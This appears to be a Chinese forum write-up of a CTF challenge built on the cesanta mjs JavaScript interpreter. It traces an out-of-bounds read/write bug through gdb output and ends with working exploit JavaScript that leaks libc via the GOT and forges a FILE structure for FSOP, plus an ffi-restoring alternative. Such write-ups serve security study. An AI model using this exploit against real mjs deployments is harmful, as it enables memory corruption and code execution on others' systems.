请教个问题,我调用getMJS()后,返回的是foreign_ptr@555555781260 (一个foreign类型的指针),那么我如何得到这个地址的值,我尝试了各种类型转换都没成功
比赛期间时间没来得及,赛后解出。
题如其名,是个小型的js解释器。最近出现了不少讲javascript的帖子,下文将讲述作为一个初学者的我是如何一步步分析这题目的。
准备
题目给出了目标binary,除了canary其余保护全开,另外还给出了编译方法。
This is a vulnerable software. I patched some of the vulnerabilities, but I think you can still find a way to exploit it, right? Prove it.
If you want to build the chall by yourself, plz type the following commands
git clone https://github.com/cesanta/mjs
cd mjs
git reset --hard fd0bf16
patch -p1 < ../diff.patch
cd mjs && make
按照上述命令编译,发现出来的binary不一致,可能是编译器或者链接库版本差异导致。目前不考虑这个问题,我们自行编译的好处是可以保留符号方便调试。虽然题目的makefile里设置了-g的编译参数,但实际上binary被strip过了。
漏洞分析
现在程序有了如何找漏洞?这玩意儿代码量看起来也不小。
15708 ./mjs.c
1462 ./frozen/frozen.c
538 ./mjs/src/mjs_gc.c
60 ./mjs/src/mjs_main.c
1179 ./mjs/src/mjs_exec.c
148 ./mjs/src/mjs_bcode.c
254 ./mjs/src/mjs_tok.c
160 ./mjs/src/mjs_primitive.c
...
38482 total
github issue
既然题目给了github,不妨看看github的issue。
这个提交者看起来就是出题人,可以从issue标题中看出一些信息。其中空指针解引用之类的BUG我们不感兴趣。而Attribute address read in function getprop_builtin_foreign()
和OOB access in the function getprop_builtin_foreign()
值得注意,但点开发现出题人把issue的内容删掉了。
回头看看题目提供的diff.patch,patch了字符串相关函数,删掉了ffi功能、无关痛痒的格式化输出,patch了mjs_next函数。唯独没有处理这个标题中所说的getprop_builtin_foreign
函数。
diff --git a/mjs/src/mjs_exec.c b/mjs/src/mjs_exec.c
index f4d2e70..2bd167d 100644
--- a/mjs/src/mjs_exec.c
+++ b/mjs/src/mjs_exec.c
@@ -875,7 +875,11 @@ MJS_PRIVATE mjs_err_t mjs_execute(struct mjs *mjs, size_t off, mjs_val_t *res) {
size_t retval_pos = mjs_get_int(
mjs, *vptr(&mjs->call_stack,
-1 - CALL_STACK_FRAME_ITEM_RETVAL_STACK_IDX));
- *vptr(&mjs->stack, retval_pos - 1) = mjs_pop(mjs);
+ mjs_val_t tmp = mjs_pop(mjs);
+ if (vptr(&mjs->stack, retval_pos - 1) == NULL){
+ break;
+ }
+ *vptr(&mjs->stack, retval_pos - 1) = tmp;
}
// LOG(LL_INFO, ("AFTER SETRETVAL"));
// mjs_dump(mjs, 0, stdout);
diff --git a/mjs/src/mjs_ffi.c b/mjs/src/mjs_ffi.c
index aff3939..4a09466 100644
--- a/mjs/src/mjs_ffi.c
+++ b/mjs/src/mjs_ffi.c
@@ -40,7 +40,7 @@ struct cbdata {
};
void mjs_set_ffi_resolver(struct mjs *mjs, mjs_ffi_resolver_t *dlsym) {
- mjs->dlsym = dlsym;
+ mjs->dlsym = NULL;
}
static mjs_ffi_ctype_t parse_cval_type(struct mjs *mjs, const char *s,
diff --git a/mjs/src/mjs_object.c b/mjs/src/mjs_object.c
index 3eaf542..f6fbd35 100644
--- a/mjs/src/mjs_object.c
+++ b/mjs/src/mjs_object.c
@@ -251,8 +251,11 @@ mjs_val_t mjs_next(struct mjs *mjs, mjs_val_t obj, mjs_val_t *iterator) {
if (*iterator == MJS_UNDEFINED) {
struct mjs_object *o = get_object_struct(obj);
p = o->properties;
- } else {
- p = ((struct mjs_property *) get_ptr(*iterator))->next;
+ } else {
+ p = ((struct mjs_property *) get_ptr(*iterator));
+ if(p != NULL){
+ p = p->next;
+ }
}
if (p == NULL) {
diff --git a/mjs/src/mjs_string.c b/mjs/src/mjs_string.c
index 65b2e09..70c0214 100644
--- a/mjs/src/mjs_string.c
+++ b/mjs/src/mjs_string.c
@@ -343,6 +343,7 @@ MJS_PRIVATE void mjs_string_index_of(struct mjs *mjs) {
goto clean;
}
str = mjs_get_string(mjs, &mjs->vals.this_obj, &str_len);
+ if (str_len > strlen(str)) goto clean;
if (!mjs_check_arg(mjs, 0, "searchValue", MJS_TYPE_STRING, &substr_v)) {
goto clean;
@@ -455,7 +456,7 @@ MJS_PRIVATE void mjs_mkstr(struct mjs *mjs) {
if (offset_v != MJS_UNDEFINED) {
offset = mjs_get_int(mjs, offset_v);
}
- len = mjs_get_int(mjs, len_v);
+ len = 0;
ret = mjs_mk_string(mjs, ptr + offset, len, copy);
...
POC分析
猜测这里的漏洞仍然存在,但我们不用着急深入代码,可以再看看其他issue。然后注意到HongxuChen也提了很多类似的issue,看起来是libFuzzer弄出来的。
点开发现HongxuChen提供了详细信息和全部的poc,见https://github.com/ntu-sec/pocs/tree/master/mjs-8d847f2/crashes 。随便下载一个执行,发现果然crash了。
浏览一下,作者把漏洞类型也标注了,不妨试试read
和write
类型的,很快可以发现 https://github.com/ntu-sec/pocs/blob/master/mjs-8d847f2/crashes/read_mjs.c:9644_1.js 触发了SIGSEGV。
代码很简单:
let s ;
let o = (s);
let z = JSON.parse[333333333%3333333333] === 'xx'
基本可以确定是JSON.parse[333333333%3333333333]
导致了读内存崩溃,可以试着gdb调一下。
Program received signal SIGSEGV, Segmentation fault. [12/575]
0x0000555555568304 in getprop_builtin_foreign (mjs=0x555555782010, val=18442897249027941072, name=0x555555782860 "74565", name_len=5, res=0x7fffffffd1b0) at src/mjs_exec.c:501
501 *res = mjs_mk_number(mjs, *(ptr + idx));
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────────────────────────
RAX 0x55555556e2d0 (mjs_op_json_parse) ◂— push rbp
RBX 0x0
RCX 0xfff2000000000000
RDX 0x7fffffffce01 ◂— 0x7fffffffce
RDI 0x555555782010 ◂— 0x0
RSI 0x12345
...
───────────────────────────────────────────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────────────────────────────────────────
► 0x555555568304 <getprop_builtin_foreign+132> movzx ecx, byte ptr [rax + rsi]
0x555555568308 <getprop_builtin_foreign+136> cvtsi2sd xmm0, ecx
0x55555556830c <getprop_builtin_foreign+140> call mjs_mk_number <0x555555574ce0>
...
───────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────────────────────────────────────────────────────
496
497 if (!isnum) {
498 mjs_prepend_errorf(mjs, MJS_TYPE_ERROR, "index must be a number");
499 } else {
500 uint8_t *ptr = (uint8_t *) mjs_get_ptr(mjs, val);
► 501 *res = mjs_mk_number(mjs, *(ptr + idx));
502 }
503 return 1;
504 }
505
这里源码中的ptr对应rax,是一个函数地址,而idx则对应于rsi,而rsi是我随便给的下标0x12345。也就是说这里可以越界读了,并且这里的函数就是前面说的getprop_builtin_foreign
。
而对应的越界写也类似,用JSON.parse[0x12345] = 0x99
即可越界写入。
RAX 0x55555556e2d0 (mjs_op_json_parse) ◂— push rbp [11/651]
RBX 0x0
RCX 0x99
RDX 0x4063200000000099
RDI 0xfff255555556e2d0
RSI 0x12345
...
───────────────────────────────────────────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────────────────────────────────────────
► 0x555555566e71 <exec_expr+1777> mov byte ptr [rax + rsi], dl
0x555555566e74 <exec_expr+1780> jmp exec_expr+1785 <0x555555566e79>
...
───────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────────────────────────────────────────────────────
342 mjs_prepend_errorf(mjs, MJS_TYPE_ERROR,
343 "only number 0 .. 255 can be assigned");
344 val = MJS_UNDEFINED;
345 } else {
346 uint8_t *ptr = (uint8_t *) mjs_get_ptr(mjs, obj);
► 347 *(ptr + ikey) = (uint8_t) ival;
...
此时可以仔细看看代码了。
static int getprop_builtin_foreign(struct mjs *mjs, mjs_val_t val,
const char *name, size_t name_len,
mjs_val_t *res) {
int isnum = 0;
int idx = cstr_to_ulong(name, name_len, &isnum);
if (!isnum) {
mjs_prepend_errorf(mjs, MJS_TYPE_ERROR, "index must be a number");
} else {
uint8_t *ptr = (uint8_t *) mjs_get_ptr(mjs, val);
*res = mjs_mk_number(mjs, *(ptr + idx));
}
return 1;
}
从函数名字可以猜测是对foreign
类型的对象做get
的操作。
在mjs_builtin.c
中有其他定义,
/*
* Populate JSON.parse() and JSON.stringify()
*/
v = mjs_mk_object(mjs);
mjs_set(mjs, v, "stringify", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_op_json_stringify));
mjs_set(mjs, v, "parse", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_op_json_parse));
mjs_set(mjs, obj, "JSON", ~0, v);
/*
* Populate Object.create()
*/
v = mjs_mk_object(mjs);
mjs_set(mjs, v, "create", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_op_create_object));
mjs_set(mjs, obj, "Object", ~0, v);
/*
* Populate numeric stuff
*/
mjs_set(mjs, obj, "NaN", ~0, MJS_TAG_NAN);
mjs_set(mjs, obj, "isNaN", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_op_isnan));
}
利用
理想计划
上面这些函数也可以用作越界的base,没什么太大的区别。程序开启了Full RelRO,没法做GOT劫持,但我们可以相对地址越界读取GOT表,泄漏出libc,然后写libc。写libc需要知道libc和base的偏移,也就是得知道程序段的绝对地址。再看看程序的数据段上还有什么。
pwndbg> tele 0x555555781000 500
00:0000│ 0x555555781000 (data_start) ◂— 0x0
01:0008│ 0x555555781008 (__dso_handle) ◂— 0x555555781008
02:0010│ 0x555555781010 (cs_log_cur_msg_level) ◂— 0xffffffff
03:0018│ 0x555555781018 (cs_to_hex.hex) —▸ 0x555555579732 ◂— xor byte ptr [rcx], dh
... ↓
05:0028│ 0x555555781028 ◂— 0x0
06:0030│ 0x555555781030 (s_assign_ops) ◂— 0x1e00000005
07:0038│ 0x555555781038 (s_assign_ops+8) ◂— 0x200000001f
08:0040│ 0x555555781040 (s_assign_ops+16) ◂— 0x2400000021 /* '!' */
09:0048│ 0x555555781048 (s_assign_ops+24) ◂— 0x2f0000002e /* '.' */
...
1a:00d0│ 0x5555557810d0 (s_postfix_ops) ◂— 0x1c0000001d
1b:00d8│ 0x5555557810d8 (s_postfix_ops+8) ◂— 0x0
1c:00e0│ 0x5555557810e0 (opcodetostr.names) —▸ 0x55555557bc62 ◂— push r8 /* 'NOP' */
1d:00e8│ 0x5555557810e8 (opcodetostr.names+8) —▸ 0x55555557bc66 ◂— push rdx /* 'DROP' */
...
43:0218│ 0x555555781218 (completed) ◂— 0x0
44:0220│ 0x555555781220 (cs_log_level) ◂— 0x0
45:0228│ 0x555555781228 (cs_log_file) ◂— 0x0
46:0230│ 0x555555781230 (s_file_level) ◂— 0x0
47:0238│ 0x555555781238 ◂— 0x0
48:0240│ 0x555555781240 ◂— 0x0
49:0248│ 0x555555781248 ◂— 0x0
...
可以看到数据段上有一些指向字节码名称字符串的指针(如opcodetostr.names),这些指针指向程序段内部,于是我们可以泄漏出程序段基地址。理想中我们可以越界写libc中的函数指针了,但是注意到getprop_builtin_foreign
中idx是个int,而libc和程序段的偏移超出了int范围。所以写libc的计划不可行。
能不能写一些函数指针呢?这时我们继续观察程序数据段,发现没有任何堆指针。
pwndbg> tele 0x555555781200 200
00:0000│ 0x555555781200 (opcodetostr.names+288) —▸ 0x55555557bd93 ◂— pop r15 /* 'BCODE_HDR' */
01:0008│ 0x555555781208 (opcodetostr.names+296) —▸ 0x55555557bd9d ◂— push r10 /* 'ARGS' */
02:0010│ 0x555555781210 (opcodetostr.names+304) —▸ 0x55555557bda2 ◂— push r10 /* 'FOR_IN_NEXT' */
03:0018│ 0x555555781218 (completed) ◂— 0x0
... ↓
回头再看代码发现,各种变量都在栈上,栈地址看起来也是无从泄漏。此时陷入僵局。
FSOP
但想来想去只能从数据段上入手,在IDA中观察发现刚刚忽略了cs_log_level
和cs_log_file
这两个全局变量,而cs_log_file
是FILE *
!
交叉引用发现cs_log_set_file
负责设置变量,但没有其他函数调用它;另外还有cs_log_printf
和cs_log_print_prefix
使用了cs_log_file
。
int cs_log_print_prefix(enum cs_log_level level, const char *file, int ln) {
...
if (level > cs_log_level && s_file_level == NULL) return 0;
...
if (s_file_level != NULL) {
...
}
if (cs_log_file == NULL) cs_log_file = stderr;
cs_log_cur_msg_level = level;
fwrite(prefix, 1, sizeof(prefix), cs_log_file);
...
}
大致逻辑就是判断参数level
和cs_log_level
的大小:level大于cs_log_level(且s_file_level为NULL)时直接返回,否则就输出到cs_log_file
。如果是NULL就把cs_log_file
赋值为stderr
再输出,最终都是调用fwrite
。
程序中有大量调用该函数的地方,
enum的定义如下。
enum cs_log_level {
LL_NONE = -1,
LL_ERROR = 0,
LL_WARN = 1,
LL_INFO = 2,
LL_DEBUG = 3,
LL_VERBOSE_DEBUG = 4,
_LL_MIN = -2,
_LL_MAX = 5,
};
可以看到我们只要调高cs_log_level
即可触发上述函数。在此之前我们可以先控制FILE* cs_log_file
,让它指到数据段后面,再在数据段后面伪造FILE结构体,利用fwrite做FSOP。
本地先对着有符号的程序调,调的差不多了上目标程序,先搞泄漏试着打远程,发现libc不一致,远程是2.27的,这时重新调整一波继续编写即可。
最终代码如下:
function relread(offset) {
let a = [];
let i = 0;
for(i=0; i<8; i++) {
let z = JSON.parse[offset+i];
a[i] = z;
}
let ret = 0;
for(i=0; i<a.length; i++) {
ret += a[i] <<(i<<3);
}
return ret;
}
function relwrite(offset, val) {
let i = 0;
for(i=0; i<8; i++) {
JSON.parse[offset+i] = (val>>(i<<3))&0xff;
}
}
let base = 0x55555556e370;
let got = 0x55555577fef8;
let pnop = 0x5555557800e0;
let code = relread(pnop-base) - 0x27af0;
let tmp = relread(got-base);
let libc = tmp - 0x7f680; //ftell
print(tmp);
print(base);
print(libc);
print(code);
base = code + 0x1a370;
let log_level = code + 0x22c220;
let pfile = code + 0x22c228;
let fake_file_addr = code + 0x22c800;
print(pfile);
print(log_level);
print(fake_file_addr);
let s = [0, 0, 0, 0, 0, 0xffffffffffffffff, 0, 0, (libc+0x1b3e9a-100)/2, 0, 0, 0, 0, 0, 0, 0, 0, code+0x22cc00, 0, 0, 0, 0, 0, 0, 0, 0, 0, libc+4096864, libc+324672, 0];
let i;
for(i=0; i < s.length; i++) {
relwrite(fake_file_addr+8*i-base, s[i]);
}
relwrite(pfile-base, fake_file_addr);
relwrite(log_level-base, 999);
relwrite(log_level-base, 0);
另一条路
请教了大佬,发现我在看JSON.parse
初始化部分代码时忽略了一个重要函数,getMJS
。
void mjs_init_builtin(struct mjs *mjs, mjs_val_t obj) {
mjs_val_t v;
mjs_set(mjs, obj, "global", ~0, obj);
mjs_set(mjs, obj, "load", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_load));
mjs_set(mjs, obj, "print", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_print));
mjs_set(mjs, obj, "ffi", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_ffi_call));
mjs_set(mjs, obj, "ffi_cb_free", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_ffi_cb_free));
mjs_set(mjs, obj, "mkstr", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_mkstr));
mjs_set(mjs, obj, "getMJS", ~0, // here
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_get_mjs));
mjs_set(mjs, obj, "die", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_die));
mjs_set(mjs, obj, "gc", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_do_gc));
...
/*
* Populate JSON.parse() and JSON.stringify()
*/
v = mjs_mk_object(mjs);
mjs_set(mjs, v, "stringify", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_op_json_stringify));
mjs_set(mjs, v, "parse", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_op_json_parse));
...
这个函数的实现即为mjs_get_mjs
,对应代码:
static void mjs_get_mjs(struct mjs *mjs) {
mjs_return(mjs, mjs_mk_foreign(mjs, mjs));
}
可以看到这里直接把mjs这个核心对象作为foreign返回了。
回顾一下patch中的操作。
void mjs_set_ffi_resolver(struct mjs *mjs, mjs_ffi_resolver_t *dlsym) {
- mjs->dlsym = dlsym;
+ mjs->dlsym = NULL;
}
既然可以通过getMJS
拿到mjs对象,而我们又可以越界读GOT拿到libc地址,所以我们把mjs->dlsym
重新恢复,即可使得ffi
可用,非常简洁明了的利用方法。